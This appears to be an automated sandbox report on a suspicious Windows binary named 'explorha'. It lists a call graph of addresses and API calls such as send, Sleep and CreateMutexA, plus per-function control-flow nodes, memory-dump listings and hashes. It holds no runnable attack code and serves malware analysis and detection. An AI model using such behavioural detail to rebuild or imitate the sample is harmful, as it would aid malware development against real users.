3 API calls 11200->11202 11202->11200 11202->11201 10774 863e9f 10775 863eb6 10774->10775 10776 863ead 10774->10776 10778 862310 10776->10778 10779 862324 10778->10779 10782 87cbbd 10779->10782 10790 89517a 10782->10790 10784 86232a 10784->10775 10785 87cc35 ___std_exception_copy 10797 87c83d 10785->10797 10787 87cc28 10793 87c5e6 10787->10793 10801 8965b9 10790->10801 10792 87cbe5 10792->10784 10792->10785 10792->10787 10794 87c62f ___std_exception_copy 10793->10794 10795 87c642 shared_ptr 10794->10795 10807 87ca2f 10794->10807 10795->10784 10798 87c868 10797->10798 10800 87c871 shared_ptr 10797->10800 10799 87ca2f 4 API calls 10798->10799 10799->10800 10800->10784 10802 8965be __cftof 10801->10802 10802->10792 10803 89ec54 __cftof 3 API calls 10802->10803 10806 89a21f __cftof 10802->10806 10803->10806 10804 897c7d __cftof 3 API calls 10805 89a252 10804->10805 10806->10804 10818 87d56f 10807->10818 10810 87ca78 10810->10795 10812 87caae 10813 87d56f InitOnceExecuteOnce 10812->10813 10814 87caf1 10813->10814 10815 87caf8 10814->10815 10816 89834b 3 API calls 10814->10816 10815->10795 10817 87cb2e 10816->10817 10817->10795 10830 87e2c1 10818->10830 10821 89834b 10822 898357 __dosmaperr 10821->10822 10823 89bc91 __cftof 3 API calls 10822->10823 10828 89835c 10823->10828 10824 89a20f __cftof 3 API calls 10825 898386 10824->10825 10826 898395 10825->10826 10834 89801d 10825->10834 10826->10812 10828->10824 10829 8983bd ___free_lconv_mon 10829->10812 10831 87e2cf InitOnceExecuteOnce 10830->10831 10833 87ca71 10830->10833 10831->10833 10833->10810 10833->10821 10835 897f9a __cftof 3 API calls 10834->10835 10836 89802f 10835->10836 10836->10829 11307 86d5df 11309 86d5e3 __cftof __dosmaperr 11307->11309 11308 86d879 shared_ptr std::invalid_argument::invalid_argument 11309->11308 11310 87dd3c GetSystemTimePreciseAsFileTime 11309->11310 11311 86d6e2 11310->11311 11311->11308 11312 87d8fa 4 API calls 11311->11312 11313 86d8ad 11312->11313 11314 87d8fa 4 API calls 11313->11314 11315 86d8bd 11314->11315 11316 87d8fa 4 API calls 11315->11316 11317 86d8c3 11316->11317 11318 87d8fa 4 API calls 11317->11318 11319 86d8c9 11318->11319 10858 86d2dc 10859 86d2e9 shared_ptr 10858->10859 10860 86d352 shared_ptr std::invalid_argument::invalid_argument 10859->10860 10886 87dd3c 10859->10886 10863 86d4fb 10889 87d8fa 10863->10889 10864 86d41b 10865 86d434 send 10864->10865 10867 86d451 10864->10867 10865->10864 10865->10867 10868 86d470 send 10867->10868 10872 86d48d 10867->10872 10868->10867 10868->10872 10869 87d8fa 4 API calls 10875 86d507 __cftof 10869->10875 10870 86d4cf __Mtx_unlock 10870->10869 10873 86d4e8 std::invalid_argument::invalid_argument 10870->10873 10871 86d4b2 send 10871->10872 10872->10870 10872->10871 10874 86d879 shared_ptr std::invalid_argument::invalid_argument 10875->10874 10876 87dd3c GetSystemTimePreciseAsFileTime 10875->10876 10877 86d6e2 10876->10877 10877->10874 10878 87d8fa 4 API calls 10877->10878 10879 86d8ad 10878->10879 10880 87d8fa 4 API calls 10879->10880 10881 86d8bd 10880->10881 10882 87d8fa 4 API calls 10881->10882 10883 86d8c3 10882->10883 10884 87d8fa 4 API calls 10883->10884 10885 86d8c9 10884->10885 10893 87dae2 10886->10893 10888 86d410 10888->10863 10888->10864 10890 87d922 10889->10890 10891 87d904 10889->10891 10890->10890 10891->10890 10910 87d927 10891->10910 10894 87db38 10893->10894 10896 87db0a std::invalid_argument::invalid_argument 10893->10896 10894->10896 10899 87e5fb 10894->10899 10896->10888 10897 87db8d __Xtime_diff_to_millis2 10897->10896 10898 87e5fb _xtime_get GetSystemTimePreciseAsFileTime 10897->10898 10898->10897 10900 87e60a 10899->10900 10902 87e617 __aulldvrm 10899->10902 10900->10902 10903 87e5d4 10900->10903 10902->10897 10906 87e27a 10903->10906 10907 87e297 10906->10907 10908 87e28b GetSystemTimePreciseAsFileTime 10906->10908 10907->10902 10908->10907 10913 8629e0 10910->10913 10912 87d93e std::_Throw_future_error 10914 87d56f InitOnceExecuteOnce 10913->10914 10916 8629f4 __dosmaperr 10914->10916 10915 8629ff 10915->10912 10916->10915 10917 89bc91 __cftof 3 API calls 10916->10917 10922 89835c 10917->10922 10918 89a20f __cftof 3 API calls 10919 898386 10918->10919 10920 898395 10919->10920 10921 89801d 3 API calls 10919->10921 10920->10912 10923 8983bd ___free_lconv_mon 10921->10923 10922->10918 10923->10912 11357 87e75c 11359 87e76c 11357->11359 11358 87e814 11359->11358 11360 87e810 RtlWakeAllConditionVariable 11359->11360 11203 86205a 11206 87dd8c 11203->11206 11205 862064 11207 87ddb4 11206->11207 11208 87dd9c 11206->11208 11207->11205 11208->11207 11210 87e64e 11208->11210 11211 87e365 __Mtx_init_in_situ InitializeCriticalSectionEx 11210->11211 11212 87e660 11211->11212 11212->11208 10924 8980d4 10925 8980ec 10924->10925 10926 8980e2 10924->10926 10927 89801d 3 API calls 10925->10927 10928 898106 ___free_lconv_mon 10927->10928 10524 86a326 10525 86a340 10524->10525 10527 86a362 shared_ptr 10524->10527 10526 86a423 Sleep CreateMutexA 10525->10526 10525->10527 10528 86a45e 10526->10528 10837 8660a6 10839 8660ba shared_ptr 10837->10839 10838 86613e shared_ptr std::invalid_argument::invalid_argument 10839->10838 10840 865d40 3 API calls 10839->10840 10841 866231 10840->10841 10842 8621c0 3 API calls 10841->10842 10843 866249 shared_ptr 10842->10843 10844 865d40 3 API calls 10843->10844 10850 8663d2 shared_ptr std::invalid_argument::invalid_argument 10843->10850 10845 8662bd 10844->10845 10846 8621c0 3 API calls 10845->10846 10848 8662d7 shared_ptr 10846->10848 10847 865d40 3 API calls 10847->10848 10848->10847 10849 8621c0 3 API calls 10848->10849 10848->10850 10849->10848 11263 87e7a6 11265 87e7b7 11263->11265 11264 87e7bf 11265->11264 11267 87e82e 11265->11267 11268 87e83c SleepConditionVariableCS 11267->11268 11270 87e855 11267->11270 11268->11270 11270->11265 10929 863ee0 10930 863f22 10929->10930 10931 863fd2 10930->10931 10932 863f8c 10930->10932 10935 863f35 std::invalid_argument::invalid_argument 10930->10935 10942 863de0 10931->10942 10936 8634e0 10932->10936 10937 863516 10936->10937 10941 86354e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10937->10941 10948 862be0 10937->10948 10939 86359e 10939->10941 10957 862b00 10939->10957 10941->10935 10943 863e48 10942->10943 10945 863e1e 10942->10945 10944 863e58 10943->10944 10946 862b00 3 API calls 10943->10946 10944->10935 10945->10935 10947 863e7f 10946->10947 10947->10935 10949 862c1d 10948->10949 10950 87d56f InitOnceExecuteOnce 10949->10950 10951 862c46 10950->10951 10952 862c51 std::invalid_argument::invalid_argument 10951->10952 10953 862c88 10951->10953 10964 87d587 10951->10964 10952->10939 10971 862340 10953->10971 10958 862b0e 10957->10958 10985 87ced7 10958->10985 10960 862b42 10961 862b49 10960->10961 10991 862b80 10960->10991 10961->10941 10963 862b58 std::_Throw_future_error 10965 87d593 std::_Throw_future_error 10964->10965 10966 87d603 10965->10966 10967 87d5fa 10965->10967 10969 8629e0 4 API calls 10966->10969 10974 87d50f 10967->10974 10970 87d5ff 10969->10970 10970->10953 10980 87cc66 10971->10980 10973 862372 10975 87e2c1 InitOnceExecuteOnce 10974->10975 10976 87d527 10975->10976 10977 87d52e 10976->10977 10978 89834b 3 API calls 10976->10978 10977->10970 10979 87d537 10978->10979 10979->10970 10981 87cc81 std::_Throw_future_error 10980->10981 10982 89a20f __cftof 3 API calls 10981->10982 10984 87cce8 __cftof std::invalid_argument::invalid_argument 10981->10984 10983 87cd2f 10982->10983 10984->10973 10986 87cee4 10985->10986 10990 87cf03 Concurrency::details::_Reschedule_chore 10985->10990 10994 87e207 10986->10994 10988 87cef4 10988->10990 10996 87ceae 10988->10996 10990->10960 10992 87ce8b TpReleaseWork 10991->10992 10993 862bb2 shared_ptr 10992->10993 10993->10963 10995 87e222 CreateThreadpoolWork 10994->10995 10995->10988 10997 87ceb7 Concurrency::details::_Reschedule_chore 10996->10997 11000 87e45c 10997->11000 10999 87ced1 10999->10990 11001 87e471 TpPostWork 11000->11001 11001->10999 11192 864020 11193 86406a 11192->11193 11194 8640b2 std::invalid_argument::invalid_argument 11193->11194 11195 863de0 3 API calls 11193->11195 11195->11194 11271 861fa0 11272 87dd1b __Mtx_init_in_situ 2 API calls 11271->11272 11273 861fac 11272->11273 11002 86d6ee 11003 86d72c __Mtx_unlock 11002->11003 11004 86d8b7 11003->11004 11005 86d76d 11003->11005 11007 87d8fa 4 API calls 11004->11007 11020 86d3f0 11005->11020 11008 86d7ed 11007->11008 11010 87d8fa 4 API calls 11008->11010 11012 86d7f8 shared_ptr __Mtx_unlock 11008->11012 11009 86d7e0 11011 87dd3c GetSystemTimePreciseAsFileTime 11009->11011 11010->11012 11011->11008 11013 87d8fa 4 API calls 11012->11013 11019 86d879 shared_ptr std::invalid_argument::invalid_argument 11012->11019 11016 86d8c9 11013->11016 11014 86d77f 11014->11009 11015 86d7ce 11014->11015 11018 86d3f0 8 API calls 11014->11018 11017 86d3f0 8 API calls 11015->11017 11017->11009 11018->11014 11021 87dd3c GetSystemTimePreciseAsFileTime 11020->11021 11022 86d410 11021->11022 11023 86d4fb 11022->11023 11024 86d41b 11022->11024 11026 87d8fa 4 API calls 11023->11026 11025 86d434 send 11024->11025 11027 86d451 11024->11027 11025->11024 11025->11027 11030 86d4cf __Mtx_unlock 11026->11030 11028 86d470 send 11027->11028 11032 86d48d 11027->11032 11028->11027 11028->11032 11029 87d8fa 4 API calls 11035 86d507 __cftof 11029->11035 11030->11029 11033 86d4e8 std::invalid_argument::invalid_argument 11030->11033 11031 86d4b2 send 11031->11032 11032->11030 11032->11031 11033->11014 11034 86d879 shared_ptr std::invalid_argument::invalid_argument 11034->11014 11035->11034 11036 87dd3c GetSystemTimePreciseAsFileTime 11035->11036 11037 86d6e2 11036->11037 11037->11034 11038 87d8fa 4 API calls 11037->11038 11039 86d8ad 11038->11039 11040 87d8fa 4 API calls 11039->11040 11041 86d8bd 11040->11041 11042 87d8fa 4 API calls 11041->11042 11043 86d8c3 11042->11043 11044 87d8fa 4 API calls 11043->11044 11045 86d8c9 11044->11045 11320 89a1e1 11321 899e37 3 API calls 11320->11321 11322 89a1ff 11321->11322 11046 86daeb 11047 87dd3c GetSystemTimePreciseAsFileTime 11046->11047 11050 86dafe __Mtx_unlock 11047->11050 11048 86db62 11049 87d8fa 4 API calls 11048->11049 11051 86db68 11049->11051 11050->11048 11052 87d8fa 4 API calls 11050->11052 11053 86dac3 std::invalid_argument::invalid_argument 11050->11053 11052->11048 11327 86c929 11329 86c960 11327->11329 11338 86c942 shared_ptr 11327->11338 11328 86cd5a shared_ptr std::invalid_argument::invalid_argument 11330 865d40 3 API calls 11329->11330 11329->11338 11331 86c9db 11330->11331 11333 86c290 3 API calls 11331->11333 11332 865d40 3 API calls 11334 86cdf5 11332->11334 11333->11338 11335 865d40 3 API calls 11334->11335 11336 86ce27 11335->11336 11337 865d40 3 API calls 11336->11337 11339 86ce43 shared_ptr 11337->11339 11338->11328 11338->11332 10508 897cb9 10511 897b57 10508->10511 10513 897b65 __cftof 10511->10513 10512 897bb0 10513->10512 10516 897bbb 10513->10516 10515 897bba 10522 89b922 GetPEB 10516->10522 10518 897bc5 10519 897bda __cftof 10518->10519 10520 897bca GetPEB 10518->10520 10521 897bf2 ExitProcess 10519->10521 10520->10519 10523 89b93c __cftof 10522->10523 10523->10518 11361 864176 11362 862310 4 API calls 11361->11362 11363 86417f 11362->11363 11218 862070 11219 87dd8c InitializeCriticalSectionEx 11218->11219 11220 86207a 11219->11220 11221 866a70 11222 866aa2 11221->11222 11231 897cf0 11222->11231 11227 897ccf 3 API calls 11228 866abf 11227->11228 11229 897ccf 3 API calls 11228->11229 11230 866ad7 11229->11230 11232 89bc91 __cftof 3 API calls 11231->11232 11233 866aa8 11232->11233 11234 897ccf 11233->11234 11235 89bc91 __cftof 3 API calls 11234->11235 11236 866ab0 11235->11236 11236->11227 11274 8641b0 11277 8639c0 11274->11277 11276 8641bb shared_ptr 11278 8639f9 11277->11278 11279 863a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 11278->11279 11282 863b38 11278->11282 11287 8631d0 11278->11287 11279->11276 11280 8631d0 5 API calls 11284 863b5f 11280->11284 11282->11280 11282->11284 11283 863b68 11283->11276 11284->11283 11285 863710 3 API calls 11284->11285 11286 863bdb 11285->11286 11288 87dd3c GetSystemTimePreciseAsFileTime 11287->11288 11291 863214 11288->11291 11289 87d8fa 4 API calls 11290 86323c __Mtx_unlock 11289->11290 11292 87d8fa 4 API calls 11290->11292 11294 863250 std::invalid_argument::invalid_argument 11290->11294 11291->11289 11291->11290 11293 863277 11292->11293 11295 87dd3c GetSystemTimePreciseAsFileTime 11293->11295 11294->11282 11296 8632af 11295->11296 11297 87d8fa 4 API calls 11296->11297 11298 8632b6 11296->11298 11297->11298 11299 87d8fa 4 API calls 11298->11299 11300 8632d7 __Mtx_unlock 11298->11300 11299->11300 11301 87d8fa 4 API calls 11300->11301 11302 8632eb 11300->11302 11303 86330e 11301->11303 11302->11282 11303->11282

                                                                                                      Executed Functions

                                                                                                      Function 00897BBB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 304 897bbb-897bc8 call 89b922 307 897bea-897bfc call 897bfd ExitProcess 304->307 308 897bca-897bd8 GetPEB 304->308 308->307 310 897bda-897be9 308->310 310->307
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00897BBA,?,?,?,?,?,00898C0E), ref: 00897BF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 86b491709a31fd81043bfd9ec24a56c6dc5116f9a9495d179df47978bf2713aa
                                                                                                      • Instruction ID: 26acf4514911af94d1ad1e90d69b1c5e202cc5d7e2ebbd99058d06738ea8b788
                                                                                                      • Opcode Fuzzy Hash: 86b491709a31fd81043bfd9ec24a56c6dc5116f9a9495d179df47978bf2713aa
                                                                                                      • Instruction Fuzzy Hash: 89E08C30068208AFCF267B18D829EA83B9DFF51364F081810F9048A222DB35FD51C590
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 0 869675-869695 4 869697-8696a3 0->4 5 8696c3-8696df 0->5 6 8696a5-8696b3 4->6 7 8696b9-8696c0 call 87ecf8 4->7 8 8696e1-8696ed 5->8 9 86970d-86972c 5->9 6->7 14 86a3ec 6->14 7->5 10 869703-86970a call 87ecf8 8->10 11 8696ef-8696fd 8->11 12 86972e-86973a 9->12 13 86975a-86a3e6 call 879750 9->13 10->9 11->10 11->14 17 869750-869757 call 87ecf8 12->17 18 86973c-86974a 12->18 20 86a423-86a466 Sleep CreateMutexA 14->20 21 86a3ec call 8982fa 14->21 17->13 18->14 18->17 21->20
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885037411.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885058736.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885085749.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885105956.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885128001.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885150152.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885197334.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885239465.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885280587.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885308584.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885349685.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885393712.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885436688.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885511659.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885646914.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885810855.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1885865893.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886054089.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886116787.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886155065.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886196136.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886231707.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886268739.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886307677.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886353370.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886389613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886472172.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886511462.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886550159.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886593194.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886633721.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886673582.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886711070.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886751171.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1886795331.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 01250dac7a7625693d4a4fde4938c52b76ba4e66f40406b5344f5c05b1695b31
                                                                                                      • Instruction ID: 4e72ecf6257cad8f982491df52bc96715fd5f3d22976f13ed3db17bf32d720a1
                                                                                                      • Opcode Fuzzy Hash: 01250dac7a7625693d4a4fde4938c52b76ba4e66f40406b5344f5c05b1695b31
                                                                                                      • Instruction Fuzzy Hash: 24315A716102048BEB0CDF7CDDC8B6DBB6AFB85324F208218E464EB3D5D77599808B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 31 869a14-869a34 35 869a36-869a42 31->35 36 869a62-869a7e 31->36 37 869a44-869a52 35->37 38 869a58-869a5f call 87ecf8 35->38 39 869a80-869a8c 36->39 40 869aac-869acb 36->40 37->38 43 86a3fb 37->43 38->36 45 869aa2-869aa9 call 87ecf8 39->45 46 869a8e-869a9c 39->46 41 869acd-869ad9 40->41 42 869af9-86a3e6 call 879750 40->42 48 869aef-869af6 call 87ecf8 41->48 49 869adb-869ae9 41->49 51 86a423-86a466 Sleep CreateMutexA 43->51 52 86a3fb call 8982fa 43->52 45->40 46->43 46->45 48->42 49->43 49->48 52->51
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.1884687592.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884728884.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884794570.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884815207.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884839567.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884932872.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884958352.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.1884984098.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
